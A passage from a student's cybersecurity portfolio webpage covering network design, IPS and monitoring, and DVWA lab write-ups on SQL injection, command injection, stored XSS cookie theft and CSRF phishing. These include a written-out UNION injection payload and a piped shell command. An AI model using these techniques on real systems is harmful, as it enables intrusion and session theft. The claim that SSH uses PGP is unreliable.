          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
